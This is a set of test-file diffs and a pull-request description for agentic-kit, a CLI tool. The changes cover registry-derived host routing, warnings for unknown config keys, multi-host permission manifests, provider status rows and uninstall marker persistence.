--- a/tests/kit/routing-primary.test.mjs
+++ b/tests/kit/routing-primary.test.mjs
@@ -1,6 +1,7 @@
 import { test } from 'node:test';
 import assert from 'node:assert/strict';
 import { swapHostModel, swapRoute, seedActivityRoutes, DEFAULT_ROUTES, DEFAULT_PRIMARY_HOST, PRIMARY_HOSTS } from '../../src/lib/routing.mjs';
+import { primaryHostIds } from '../../src/lib/adapters/index.mjs';
 
 // ── swapHostModel ────────────────────────────────────────────────────────────
 test('swapHostModel maps a claude model to the codex host', () => {
@@ -42,7 +43,10 @@ test('seedActivityRoutes stamps every seeded entry with provenance:seeded', () =
 });
 
 // ── constants ────────────────────────────────────────────────────────────────
-test('DEFAULT_PRIMARY_HOST is claude and both hosts are valid primaries', () => {
-  assert.equal(DEFAULT_PRIMARY_HOST, 'claude');
-  assert.deepEqual([...PRIMARY_HOSTS].sort(), ['claude', 'codex']);
+test('DEFAULT_PRIMARY_HOST is claude and PRIMARY_HOSTS mirrors the registry\'s canBePrimary set', () => {
+  assert.equal(DEFAULT_PRIMARY_HOST, 'claude'); // a policy choice, not derived from the registry
+  // PRIMARY_HOSTS must stay green under capability caps — a host gaining canBePrimary:true
+  // should extend this automatically, so derive the expectation from primaryHostIds()
+  // instead of a hand-typed host list.
+  assert.deepEqual([...PRIMARY_HOSTS].sort(), [...primaryHostIds()].sort());
 });

--- a/tests/kit/settings-config.test.mjs
+++ b/tests/kit/settings-config.test.mjs
@@ -102,3 +102,81 @@ test('loadKitConfig merges partial files over defaults (user file wins)', () => 
   assert.deepEqual(cfg.mcp.excludeFamilies, ['browser']);
   fs.rmSync(tmp, { recursive: true, force: true });
 });
+
+// F-14: an unrecognized top-level key (e.g. a future ak's `hostAdapters`)
+// must never silently round-trip as a no-op — loadKitConfig warns once,
+// naming the key, without dropping or throwing on it.
+
+/** Runs `fn` with console.error/console.log captured; returns { errLines, outLines }. */
+function captureConsole(fn) {
+  const errLines = [];
+  const outLines = [];
+  const realError = console.error;
+  const realLog = console.log;
+  console.error = (...a) => errLines.push(a.map(String).join(' '));
+  console.log = (...a) => outLines.push(a.map(String).join(' '));
+  try {
+    fn();
+  } finally {
+    console.error = realError;
+    console.log = realLog;
+  }
+  return { errLines, outLines };
+}
+
+test('loadKitConfig warns once on an unrecognized top-level key, naming it', () => {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'kit-cfg-unknown-'));
+  const f = tmpFile(tmp, 'kit.json');
+  fs.writeFileSync(f, JSON.stringify({ hostAdapters: { foo: true } }));
+  const { errLines } = captureConsole(() => loadKitConfig(f));
+  assert.equal(errLines.length, 1);
+  assert.match(errLines[0], /hostAdapters/);
+  assert.match(errLines[0], /not recognized/);
+  fs.rmSync(tmp, { recursive: true, force: true });
+});
+
+test('loadKitConfig warns nothing for a config with only recognized keys', () => {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'kit-cfg-clean-'));
+  const f = tmpFile(tmp, 'kit.json');
+  fs.writeFileSync(f, JSON.stringify({ security: false, mcp: { excludeFamilies: ['browser'] } }));
+  const { errLines } = captureConsole(() => loadKitConfig(f));
+  assert.deepEqual(errLines, []);
+  fs.rmSync(tmp, { recursive: true, force: true });
+});
+
+test('loadKitConfig warns only once per process for the same unknown key set across repeated loads', () => {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'kit-cfg-repeat-'));
+  const f = tmpFile(tmp, 'kit.json');
+  fs.writeFileSync(f, JSON.stringify({ futureFeatureFlag: true }));
+  const { errLines } = captureConsole(() => {
+    loadKitConfig(f);
+    loadKitConfig(f);
+  });
+  assert.equal(errLines.length, 1, 'a second load with the same unknown key set must not warn again');
+  fs.rmSync(tmp, { recursive: true, force: true });
+});
+
+test('loadKitConfig round-trips an unrecognized top-level key through save unchanged', () => {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'kit-cfg-roundtrip-'));
+  const f = tmpFile(tmp, 'kit.json');
+  fs.writeFileSync(f, JSON.stringify({ legacyPluginConfig: { retained: true } }));
+  const { errLines } = captureConsole(() => {
+    const cfg = loadKitConfig(f);
+    assert.deepEqual(cfg.legacyPluginConfig, { retained: true });
+    saveKitConfig(cfg, f);
+  });
+  assert.equal(errLines.length, 1, 'the unrecognized key still warns on the initial load');
+  const raw = JSON.parse(fs.readFileSync(f, 'utf8'));
+  assert.deepEqual(raw.legacyPluginConfig, { retained: true }, 'unknown key must round-trip through save exactly');
+  fs.rmSync(tmp, { recursive: true, force: true });
+});
+
+test('the unknown-key warning goes to stderr only, never stdout (so --json consumers are unaffected)', () => {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'kit-cfg-stderr-'));
+  const f = tmpFile(tmp, 'kit.json');
+  fs.writeFileSync(f, JSON.stringify({ experimentalWidget: true }));
+  const { errLines, outLines } = captureConsole(() => loadKitConfig(f));
+  assert.equal(errLines.length, 1);
+  assert.deepEqual(outLines, [], 'the unknown-key warning must never write to stdout');
+  fs.rmSync(tmp, { recursive: true, force: true });
+});

--- a/tests/kit/settings-config.test.mjs
+++ b/tests/kit/settings-config.test.mjs
@@ -127,10 +127,13 @@ function captureConsole(fn) {
 test('loadKitConfig warns once on an unrecognized top-level key, naming it', () => {
   const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'kit-cfg-unknown-'));
   const f = tmpFile(tmp, 'kit.json');
-  fs.writeFileSync(f, JSON.stringify({ hostAdapters: { foo: true } }));
+  // NOT `hostAdapters` — Wave 4 (adapter door) recognizes that key now
+  // (src/lib/config.mjs DEFAULTS.hostAdapters), so it's a poor example of an
+  // unrecognized one. Any still-genuinely-unknown key exercises the same path.
+  fs.writeFileSync(f, JSON.stringify({ someUnknownFutureKey: { foo: true } }));
   const { errLines } = captureConsole(() => loadKitConfig(f));
   assert.equal(errLines.length, 1);
-  assert.match(errLines[0], /hostAdapters/);
+  assert.match(errLines[0], /someUnknownFutureKey/);
   assert.match(errLines[0], /not recognized/);
   fs.rmSync(tmp, { recursive: true, force: true });
 });

--- a/tests/kit/setup-command.test.mjs
+++ b/tests/kit/setup-command.test.mjs
@@ -13,6 +13,7 @@ import {
   sandboxHome, assertSandboxed, snapshot, assertUnchanged, captureLog, rmrf,
   sandboxProject, writeKitConfig, offlineKitConfig, fakeGlobalRoot,
 } from './helpers/home-sandbox.mjs';
+import { HOST_REGISTRY } from '../../src/lib/adapters/index.mjs';
 
 const HOME = sandboxHome('ak-setup');
 const paths = await import('../../src/lib/paths.mjs');
@@ -67,6 +68,49 @@ test('project permission manifest omits AQE grants when AQE is disabled', () => 
   assert.equal(setup.projectPermissionManifest({ aqe: true }).length, 7);
   assert.deepEqual(setup.projectPermissionManifest({ aqe: false }).map((entry) => entry.owner),
     ['ruflo', 'ruflo', 'ruflo', 'ruflo']);
+});
+
+// F-04: the authorized/disclosed set is the UNION across every enabled
+// host's trust manifest, not claude's alone — otherwise a second host's own
+// project-scope auto-approve rule reads as "undisclosed" and
+// removeUndisclosedPermissions would strip it (and fail setup). Driven
+// through the same synthetic-host `hosts` seam trust-manifest.test.mjs uses
+// for host-registry-construction tests, so no change to registries.mjs is
+// needed to prove it.
+test('projectPermissionManifest unions a second enabled host\'s auto-approve rules', () => {
+  const future = {
+    id: 'grok', label: 'Grok CLI',
+    trust: {
+      approvalPolicy: 'managed',
+      changes: [{
+        id: 'grok-auto-approve', kind: 'auto-approve', scope: 'project',
+        owner: 'agentic-kit', value: 'Bash(grok *)', effect: 'allow the Grok CLI',
+        operations: ['setup'], features: ['project'],
+      }],
+    },
+  };
+  const cfg = { aqe: true, ruvnetBrain: true, integrations: { hosts: { claude: true, grok: true } } };
+  const manifest = setup.projectPermissionManifest(cfg, { hosts: [...HOST_REGISTRY, future] });
+  const rules = manifest.map((entry) => entry.rule);
+  assert.ok(rules.includes('Bash(grok *)'), 'the second host\'s auto-approve rule must be disclosed, not dropped');
+  assert.ok(rules.includes('mcp__claude-flow__*'), 'claude\'s own rules must still be present alongside it (a union, not a swap)');
+
+  // and the union must survive removeUndisclosedPermissions as authorized —
+  // a second host's disclosed rule must never be stripped as an intruder.
+  const project = sandboxProject('ak-setup-second-host-permission');
+  const file = path.join(project, '.claude', 'settings.json');
+  fs.mkdirSync(path.dirname(file), { recursive: true });
+  fs.writeFileSync(file, JSON.stringify({ permissions: { allow: ['Bash(grok *)'] } }, null, 2));
+  const removed = setup.removeUndisclosedPermissions(file, new Set(), new Set(rules));
+  assert.deepEqual(removed, [], 'a disclosed second-host rule must never be stripped as undisclosed');
+  rmrf(project);
+});
+
+test('projectPermissionManifest at only claude enabled is unchanged from the pre-F-04 claude-only manifest', () => {
+  // byte-identical for the default (claude-only) machine: the union with an
+  // empty "other hosts" set is exactly what trustChangesForHost('claude',
+  // {kind:'auto-approve'}) produced before this rework.
+  assert.deepEqual(setup.projectPermissionManifest({ aqe: true }), setup.PROJECT_PERMISSION_MANIFEST);
 });
 
 test('permission verification removes only newly introduced undisclosed grants', () => {

--- a/tests/kit/setup-host-flags.test.mjs
+++ b/tests/kit/setup-host-flags.test.mjs
@@ -5,6 +5,7 @@ import os from 'node:os';
 import path from 'node:path';
 import { applySetupHostFlags } from '../../src/lib/providers.mjs';
 import { loadKitConfig, saveKitConfig } from '../../src/lib/config.mjs';
+import { defaultHostMap } from '../../src/lib/adapters/index.mjs';
 
 const freshCfg = () => ({
   integrations: {
@@ -94,11 +95,7 @@ test('an empty config gets complete canonical envelopes and survives persistence
     routes: {},
   });
   assert.equal(cfg.integrations.version, 2);
-  assert.deepEqual(cfg.integrations.hosts, {
-    claude: true,
-    codex: true,
-    opencode: false,
-  });
+  assert.deepEqual(cfg.integrations.hosts, { ...defaultHostMap(), codex: true });
 
   const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'ak-setup-empty-'));
   const file = path.join(dir, 'kit.json');

--- a/tests/kit/status-command.test.mjs
+++ b/tests/kit/status-command.test.mjs
@@ -515,4 +515,47 @@ test('--json carries the opencode rows with the same shape the dashboard consume
   } finally { process.chdir(cwd); }
 });
 
+// ADR-0028 F-29: local-openai is a local ($0) provider deliberately NOT
+// projected to 'aqe' (unlike ollama, which is) — status must surface that
+// asymmetry plainly instead of letting it read as a bug.
+test('a local-openai binding surfaces an info row naming provider, host, endpoint, and the non-AQE fact', async () => {
+  seedHome();
+  const cfg = loadKitConfig();
+  cfg.integrations.bindings = [{
+    id: 'local-openai-via-codex', host: 'codex', provider: 'local-openai',
+    transport: 'openai-compatible', endpoint: 'http://127.0.0.1:8080/v1',
+    provenance: 'configured',
+  }];
+  writeKitConfig(HOME, cfg);
+  const rows = await collect();
+  const hit = rowsFor(rows, 'providers').find((r) => /local-openai/.test(r.message));
+  assert.ok(hit, `expected a local-openai row: ${rowsFor(rows, 'providers').map((r) => r.message)}`);
+  assert.equal(hit.level, 'info');
+  assert.equal(hit.fix, null, 'advisory only — nothing for sync to fix');
+  assert.match(hit.message, /codex/);
+  assert.match(hit.message, /http:\/\/127\.0\.0\.1:8080\/v1/);
+  assert.match(hit.message, /not an AQE provider/i);
+});
+
+test('an ollama-only binding (local AND aqe-projected) triggers no local-non-AQE row', async () => {
+  seedHome();
+  const cfg = loadKitConfig();
+  cfg.integrations.bindings = [{
+    id: 'ollama-via-claude', host: 'claude', provider: 'ollama',
+    transport: 'anthropic-compatible', endpoint: 'http://127.0.0.1:11434',
+    provenance: 'configured',
+  }];
+  writeKitConfig(HOME, cfg);
+  const rows = await collect();
+  const stray = rowsFor(rows, 'providers').find((r) => /not an AQE provider/i.test(r.message));
+  assert.equal(stray, undefined, `ollama is AQE-projected and must not trigger the note: ${JSON.stringify(stray)}`);
+});
+
+test('no bindings declared: no local-non-AQE row (status stays unchanged for existing users)', async () => {
+  seedHome();
+  const rows = await collect();
+  const stray = rowsFor(rows, 'providers').find((r) => /not an AQE provider/i.test(r.message));
+  assert.equal(stray, undefined, `expected zero local-non-AQE rows with no bindings: ${JSON.stringify(stray)}`);
+});
+
 test.after(() => rmrf(HOME, PROJECT));

--- a/tests/kit/status-command.test.mjs
+++ b/tests/kit/status-command.test.mjs
@@ -515,6 +515,57 @@ test('--json carries the opencode rows with the same shape the dashboard consume
   } finally { process.chdir(cwd); }
 });
 
+// F-05: the per-host detail dispatch (renderHostDetailRows) is host-neutral —
+// a fourth host renders through the EXACT SAME loop opencode does, with zero
+// host-id branching added anywhere. Proven by injecting a synthetic host id
+// that exists in neither the host registry nor collectIntegrationFacts: only
+// a `renderers` table entry and an enabled flag in cfg are required.
+test('a synthetic fourth host renders through the same host-neutral dispatch loop as opencode', async () => {
+  const synthFacts = {
+    hosts: { gizmo: { present: true, version: '4.2.0', enabled: true, wired: true } },
+  };
+  const synthRenderers = {
+    gizmo: async ({ facts, hostId }) => {
+      const f = facts.hosts[hostId];
+      return [{
+        subsystem: hostId,
+        level: f.wired ? 'ok' : 'warn',
+        message: `${hostId} ${f.version} present, wired=${f.wired}`,
+        fix: f.wired ? null : `sync wires ${hostId}`,
+      }];
+    },
+  };
+  const rows = await status.renderHostDetailRows({
+    cfg: { integrations: { hosts: { gizmo: true } } },
+    pkgRoot: PKG_ROOT,
+    facts: synthFacts,
+    renderers: synthRenderers,
+  });
+  assert.deepEqual(rows, [{
+    subsystem: 'gizmo', level: 'ok', message: 'gizmo 4.2.0 present, wired=true', fix: null,
+  }]);
+
+  // A registered-but-disabled host produces nothing — same gate opencode uses.
+  const disabledRows = await status.renderHostDetailRows({
+    cfg: { integrations: { hosts: { gizmo: false } } },
+    pkgRoot: PKG_ROOT,
+    facts: synthFacts,
+    renderers: synthRenderers,
+  });
+  assert.deepEqual(disabledRows, []);
+
+  // An enabled host with NO registered renderer produces nothing here either
+  // — it still gets install/auth rows from the separate `hosts` loop, but no
+  // detail rows, exactly like a real host nobody wrote a renderer for.
+  const noRendererRows = await status.renderHostDetailRows({
+    cfg: { integrations: { hosts: { gizmo: true } } },
+    pkgRoot: PKG_ROOT,
+    facts: synthFacts,
+    renderers: {},
+  });
+  assert.deepEqual(noRendererRows, []);
+});
+
 // ADR-0028 F-29: local-openai is a local ($0) provider deliberately NOT
 // projected to 'aqe' (unlike ollama, which is) — status must surface that
 // asymmetry plainly instead of letting it read as a bug.

--- a/tests/kit/uninstall-command.test.mjs
+++ b/tests/kit/uninstall-command.test.mjs
@@ -288,6 +288,51 @@ test('default uninstall strips ak opencode wiring + artifacts and restores user 
   assert.equal(cfg.integrations.ownership.opencode.mcp, null, 'ownership markers nulled (kit.json kept without --purge)');
 });
 
+test('a quiet-success undo still persists the nulled ownership markers (save is not gated on file changes)', async () => {
+  // The stale-marker case the save-gate bug stranded forever: ownership says
+  // mcp:'ak' but the tracked entries are ALREADY absent from opencode.json and
+  // no ak artifacts exist on disk — undo rewrites nothing (changed:false,
+  // ok:true) yet nulls cfg's markers in memory. Those nulls must reach
+  // kit.json anyway, exactly as x/host.mjs's off()/pick() persist them.
+  seedHome();
+  const cfgDir = ocHome();
+  fs.mkdirSync(cfgDir, { recursive: true });
+  fs.writeFileSync(path.join(cfgDir, 'opencode.json'), JSON.stringify({
+    model: 'opencode/kimi-k3',
+    mcp: { 'my-server': { type: 'local', command: ['x'] } },
+    permission: { edit: 'ask' },
+  }, null, 2));
+  writeKitConfig(HOME, {
+    aqe: true,
+    integrations: {
+      version: 2,
+      hosts: { claude: true, codex: false, opencode: true },
+      bindings: [],
+      ownership: {
+        opencode: {
+          mcp: 'ak',
+          managed: {
+            mcp: { 'claude-flow': { prior: null, written: { type: 'local', command: ['ruflo', 'mcp', 'start'], enabled: true } } },
+            paths: [],
+            permissions: { 'claude-flow_*': { prior: null, written: 'allow' } },
+            permissionScalar: null,
+            artifacts: { plugin: hash('never-on-disk'), agents: {}, agentStamp: null, skill: hash('never-on-disk') },
+          },
+        },
+      },
+    },
+    routing: { version: 1, primaryHost: 'claude', routes: {} },
+    providers: {},
+  });
+  const { result } = await captureLog(() => uninstall.run({ flags: { yes: true } }));
+  assert.equal(result, 0);
+  const cfg = JSON.parse(fs.readFileSync(paths.kitConfigPath(), 'utf8'));
+  assert.equal(cfg.integrations.ownership.opencode.mcp, null,
+    'stale mcp:ak marker is nulled in kit.json even when undo rewrote no file');
+  const doc = JSON.parse(fs.readFileSync(path.join(cfgDir, 'opencode.json'), 'utf8'));
+  assert.deepEqual(doc.mcp, { 'my-server': { type: 'local', command: ['x'] } }, 'user config untouched');
+});
+
 test('repeated uninstall is harmless for the opencode footprint', async () => {
   seedHome();
   seedManagedOpencode();


### PR DESCRIPTION
This is the consolidated host/provider consistency program — every phase built, reviewed, and CI-verified as its own PR into `develop`, assembled here for a single human review. **It is left open deliberately; nothing here has been merged to `main`.**

Origin: this began as an evaluation of @adrianco's [PR #131](https://github.com/pacphi/agentic-kit/pull/131) (proposed ADRs 0028/0029/0030 for Hermes/host-adapter support). We took ownership of the design, grounded it in a four-sweep research pass against live upstream source (ruflo, the three hosts, Hermes at HEAD, agentic-qe), and executed it in dependency order.

## The eight increments

| PR | Phase | What |
| --- | --- | --- |
| #143 | 1 | Per-entry provider records + the generic `local-openai` provider row; ADR-0028 accepted in-tree with corrections (F-28/F-29/F-30) |
| #144 | 3a | Quota labels hosts with no quota surface; usage-docs current-state verification (F-10) |
| #146 | 2·W1 | Dispatch by registry lookup: the import-time brick softened, lifecycle registry, uninstall-through-undo, host-keyed permissions, registry-derived guidance, unknown-key warnings (F-01/02/03/04/17/14) |
| #145+#147 | 2·W2 | `ak status` renders host detail through a host-neutral dispatch loop (F-05) |
| #148 | 2·W3 | Test expectations derive from the registry; directory parity built-in-scoped (F-21/F-06) |
| #149 | 2·W4 | **The host-adapter extension point** — validated manifest + consented subprocess hooks, no in-process third-party code, behind an experimental flag; ADR-0029 accepted, superseding ADR-0016's closed-registry clause |
| #150 | 3b | Capability-derived host tiers and asymmetry notes; docs stop claiming a closed host set (D-2/F-25/F-26/F-27) |

## How it was built

Each wave ran as a swarm of TDD builders with **disjoint file ownership** (one git author, zero merge conflicts), followed by **effort/impact-scaled review** — deep adversarial review on the load-bearing and security-critical changes, light review on mechanical ones, with a second verify pass on every major finding. Independent parallel tracks ran in git worktrees where file footprints didn't overlap.

The review layer caught and fixed real defects before merge, not after: a fail-open inversion of the qe-court collusion check; an actor-host misattribution in live events; an uninstall save-gate that stranded ownership markers; a latent path-traversal in the guidance fallback; and — in the extension point — a consent-forgery gap and a checklist-not-allowlist weakness that together could have reached an `npm install` postinstall. The security review (approve-with-nits, no RCE) ran seven named attacks; six held, the seventh was closed and pinned as a regression corpus.

## What the reviewer should know

- **The extension point ships behind `AK_EXPERIMENTAL_HOST_ADAPTERS=1`** with byte-zero default behavior — `effectiveHostRegistry()` is `HOST_REGISTRY` by reference until an adapter is admitted. ADR-0029 carries a graded Working/Demo/TBD table; external lifecycle execution, a `trust` CLI verb, and npm/URL manifest sources are explicitly TBD for a later graduation.
- **No Hermes-specific code is in-tree.** A synthetic fixture adapter under `tests/fixtures/adapters/acme` proves the contract; a real Hermes adapter waits until the contract graduates (owned by its proposer).
- **Docs follow the current-state-only policy**: history lives in ADR update notes and each doc's fix-history appendix; ADR-0016's closed-registry clause is formally superseded by ADR-0029.

59 files, +4,716/−280. Full gate green on every merged commit (typecheck, lint, markdownlint, build, ~1,682 tests across macOS/Ubuntu/Windows × Node 22/24/26).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
